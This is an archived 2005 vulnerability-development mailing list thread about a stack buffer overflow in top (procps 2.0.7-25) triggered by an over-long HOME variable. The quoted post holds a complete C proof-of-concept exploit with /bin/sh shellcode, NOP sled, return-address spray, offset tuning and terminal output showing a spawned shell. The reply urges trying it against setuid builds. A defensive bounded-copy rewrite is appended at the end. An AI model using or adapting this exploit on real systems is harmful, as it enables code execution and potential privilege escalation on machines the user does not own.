Vulnerability Development mailing list archives
Re: top (procps-2.0.7-25) vulnerability
From: "KF (lists)" <kf_lists () digitalmunition com>
Date: Mon, 09 May 2005 11:36:09 -0400
Sheesh what is with top and folks not fixing OLD arse bugs. =] You may wanna check with William LeFebvre and make sure this issue is fixed in his latest code base.
Sun freeware ships top as setuid... you may wanna try to exploit this bug there. It *may* not be fixed.
Look familiar? http://www.securiteam.com/exploits/5JP0A2A2BW.html

-KF

WINNY THOMAS wrote:
While running top on a tool of mine to do a profiling test, the top command ran into a segmentation fault. I could find two instances where the command could misbehave: 1. if you have junk data inside a file .toprc in your home directory; 2. if your environmental variable HOME is set to a string that's greater than 1024. I managed to spawn a shell out of the top command by exploiting the second issue. If you compile and run the exploit code which I am including in the mail body you will get a shell. In case you don't, you could pass parameters to the program as follows to adjust the offset. The vulnerability detail is included in the code comment.

[winnythomas@r8 WinnyThomas]$ ./putshellcode 1001
sh-2.05b$ exit
exit
[winnythomas@r8 WinnyThomas]$ ./putshellcode 120
Illegal instruction
[winnythomas@r8 WinnyThomas]$ ./putshellcode 1010
sh-2.05b$ exit
exit

In most of the tests I did on the vulnerable code I got a shell on my system without passing any parameter to the program (that is, the hardcoded offset of 1111 in my program worked well on my system).

/*
 * Program: Proof of concept code for top exploit
 * Author: Winny Thomas, Nevis networks pune
 * Vulnerability: in top.c the function get_options uses strcpy to copy the value of the
 * environment variable HOME into a static buffer that is allocated on the stack. Hence
 * it's possible to apply a standard stack smashing attack to overwrite the return address
 * on the stack and execute code which is of the attacker's choice.
 * NOTE: top is not setuid and hence the exploit won't spawn a root shell.
 * Tested on Red Hat 8 with procps version 2.0.7-25. The problem has
 * been fixed in the latest versions.
 *
 * This code is for educational purpose only and the
 * author shall not bear any responsibility for any
 * damage caused by using this code
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, strcat (header was missing) */
#include <unistd.h>   /* execl (header was missing) */

char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
char exploit_variable[1200];

/* Returns the current stack pointer: the asm leaves %esp in %eax, which is
 * the i386 return register (the classic trick; build without optimisation). */
long get_esp(void)
{
    __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[])
{
    long stackp, retaddr;
    char SETENV[1250];
    long *ptr;
    int i, j, offset = 1111;

    if (argc > 1)
        offset = atoi(argv[1]);
    stackp = get_esp();
    retaddr = stackp - offset;

    /* fill the whole buffer with the guessed return address */
    ptr = (long *)exploit_variable;   /* cast was missing in the original */
    for (i = 0; i < 1200; i += 4)
        *ptr++ = retaddr;
    /* NOP sled in the first 600 bytes, shellcode right after it */
    for (i = 0; i < 600; i++)
        exploit_variable[i] = '\x90';
    for (j = 0; j < strlen(shellcode); j++, i++)
        exploit_variable[i] = shellcode[j];

    /* hand the buffer to top through the HOME environment variable */
    sprintf(SETENV, "HOME=");
    strcat(SETENV, exploit_variable);
    putenv(SETENV);
    execl("/usr/bin/top", "top", (char *)0);
    return 0;
}
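For contrast with the bug described in the post, here is the unbounded copy pattern next to a bounded rewrite that fails closed on an over-long HOME. This is an added example, not code from top or from either poster; the 1024-byte buffer, the "/.toprc" suffix and the helper names are assumptions made for the demonstration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define HOMEBUF 1024      /* assumed size of the fixed stack buffer the post describes */
#define RCNAME  "/.toprc"

/* Pattern the post describes: unbounded strcpy() of HOME into a fixed
 * stack buffer. Shown for contrast only; nothing below calls it. */
void unsafe_rcpath(char *out)
{
    char home[HOMEBUF];
    strcpy(home, getenv("HOME"));   /* overruns when HOME > 1023 bytes (or is unset) */
    strcpy(out, home);
    strcat(out, RCNAME);
}

/* Hardened replacement: bounded formatting that fails closed. Returns 0 and fills
 * out on success, -1 if home is unset/empty or would not fit with "/.toprc" and NUL. */
int safe_rcpath(const char *home, char *out, size_t outsz)
{
    int n;
    if (home == NULL || home[0] == '\0' || outsz == 0)
        return -1;
    n = snprintf(out, outsz, "%s%s", home, RCNAME);
    if (n < 0 || (size_t)n >= outsz) {   /* would truncate: reject it */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Run safe_rcpath() on a constructed HOME of len 'A's; lets the
 * 1016-byte (fits) vs 1017-byte (rejected) boundary be checked. */
int demo_overlong(size_t len)
{
    char out[HOMEBUF], *home = malloc(len + 1);
    int rc;
    if (home == NULL) return -2;
    memset(home, 'A', len);
    home[len] = '\0';
    rc = safe_rcpath(home, out, sizeof out);
    free(home);
    return rc;
}
/* 1 if safe_rcpath() succeeds and yields exactly expect, else 0. */
int check_path(const char *home, const char *expect)
{
    char out[HOMEBUF];
    return safe_rcpath(home, out, sizeof out) == 0 && strcmp(out, expect) == 0;
}
```

A 1200-byte HOME, the case the post exploits, is rejected by safe_rcpath() instead of overrunning the buffer.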
Current thread:
- top (procps-2.0.7-25) vulnerability WINNY THOMAS (May 09)
- Re: top (procps-2.0.7-25) vulnerability Ayaz Ahmed Khan (May 10)
- Re: top (procps-2.0.7-25) vulnerability KF (lists) (May 10)
- Re: top (procps-2.0.7-25) vulnerability KF (lists) (May 10)
- Re: top (procps-2.0.7-25) vulnerability Ayaz Ahmed Khan (May 10)